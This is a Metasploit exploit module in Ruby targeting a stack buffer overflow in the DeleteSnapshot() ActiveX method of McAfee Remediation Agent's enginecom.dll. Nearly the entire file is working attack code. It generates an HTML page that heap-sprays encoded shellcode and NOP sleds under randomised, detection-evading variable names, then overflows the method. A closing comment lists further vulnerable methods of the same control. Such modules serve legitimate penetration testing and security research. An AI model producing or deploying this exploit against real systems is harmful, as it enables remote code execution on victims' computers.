modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = LowRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'McAfee Remediation Client ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in McAfee Remediation Agent 4.5.0.41. When
sending an overly long string to the DeleteSnapshot() method
of enginecom.dll (3.7.0.9) an attacker may be able to execute arbitrary code.
This control is not marked safe for scripting, so choose your attack vector accordingly.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'References' =>
[
[ 'OSVDB', '94540' ],
[ 'EDB', '16639' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => true
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
],
'DisclosureDate' => '2008-08-04',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),
])
end
def exploit
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Create some nops.
nops = Rex::Text.to_unescape(make_nops(4))
# Set the return.
ret = Rex::Text.uri_encode([target.ret].pack('L'))
# Randomize the javascript variable names.
vname = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(30) + 2)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
content = %Q|<html>
<head>
<script>
try {
var #{vname} = new ActiveXObject('Enginecom.imagineLANEngine.1');
var #{rand1} = unescape('#{shellcode}');
var #{rand2} = unescape('#{nops}');
var #{rand3} = 20;
var #{rand4} = #{rand3} + #{rand1}.length;
while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
var #{rand5} = #{rand2}.substring(0,#{rand4});
var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
var #{rand7} = new Array();
for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
var #{rand8} = "";
for (#{var_i} = 0; #{var_i} < 1024; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
#{vname}.DeleteSnapshot(#{rand8});
} catch( e ) { window.location = 'about:blank' ; }
</script>
</head>
</html>
|
content = Rex::Text.randomize_space(content)
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(content)
end
end
=begin
Other vulnerable method's:
[id(0x0000000c), helpstring("method CreateSnapFromDefaultProfile")]
void CreateSnapFromDefaultProfile(BSTR szDescription);
[id(0x00000013), helpstring("method CreateReportOfSysInfoDifferences")]
void CreateReportOfSysInfoDifferences(
BSTR szOldSnapFile,
BSTR szNewSnapFile,
BSTR szOutFile,
short format,
short append);
[id(0x0000000f), helpstring("method CreateReportOfSnapshotDifferences")]
void CreateReportOfSnapshotDifferences(
BSTR szOldSnapFile,
BSTR szNewSnapFile,
BSTR szOutFile,
short format);
[id(0x00000012), helpstring("method CreateReportOfAssetDifferences")]
void CreateReportOfAssetDifferences(
BSTR szOldSnapFile,
BSTR szNewSnapFile,
BSTR szOutFile,
short format,
BSTR pszAsset,
short append);
=end